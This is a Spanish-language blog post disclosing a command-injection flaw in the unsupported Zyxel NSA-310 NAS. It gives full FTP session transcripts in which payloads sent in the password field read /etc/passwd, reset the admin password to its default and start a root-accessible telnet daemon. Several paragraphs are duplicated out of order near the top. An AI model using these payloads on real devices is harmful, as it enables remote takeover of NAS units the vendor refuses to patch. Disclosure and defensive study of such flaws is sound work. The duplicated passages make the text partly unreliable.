Vulnerabilidad en Zyxel Mediaserver/NAS NSA-310
Recientemente se ha reportado una vulnerabilidad grave en el Mediaserver/NAS modelo ZyXEL NSA-310 que podría permitir a un atacante remoto ejecutar código arbitrariamente como root.
Además es posible cambiar la contraseña del admin sin conocer la anterior llamando al script del sistema /sbin/account.sh:
Una vez hecho ésto la contraseña se habrá restablecido a la de por defecto, es decir, admin / 1234.
Por último, podemos también arrancar un demonio telnetd al que acceder como:
admin / changed_pw
Ya se conocía la de existencia de un backdoor en el último firmware V4.70(AFK.1), pero es que además es posible usar una comilla simple "'" para introducir comandos de sistema.
Veamos unos ejemplos:
Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. 220 Welcome to PureFTPd [TLS] 220 You are user number 1 of 10 allowed. 220 Local time is now 09:00. Server port: 21. 220 This is a private system No anonymous login 220 IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';cat /etc/passwd; root:x:0:0:root:/root:/bin/shDe forma sencilla un atacante podría usar el servidor FTP para mostrar el contenido del fichero passwd.
Además es posible cambiar la contraseña del admin sin conocer la anterior llamando al script del sistema /sbin/account.sh:
Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. 220 Welcome to PureFTPd [TLS] 220 You are user number 1 of 10 allowed. 220 Local time is now 09:00. Server port: 21. 220 This is a private system No anonymous login 220 IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';/sbin/account.sh;
Una vez hecho ésto la contraseña se habrá restablecido a la de por defecto, es decir, admin / 1234.
Por último, podemos también arrancar un demonio telnetd al que acceder como:
admin / changed_pw
root / changed_pw
Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. 220 Welcome to PureFTPd [TLS] 220 You are user number 1 of 10 allowed. 220 Local time is now 09:00. Server port: 21. 220 This is a private system No anonymous login 220 IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';telnetd;
Zyxel se niega a solucionar la vulnerabilidad porque hace dos años que se llegó su ciclo final de soporte conocido como EoL End of life, sin embargo el dispositivo sigue a la venta en Amazon...
Autor
Japtron
Private Investigator Computer Security, Vulnerability Research, Exploits Development. CEH - Certified Ethical Hacker.
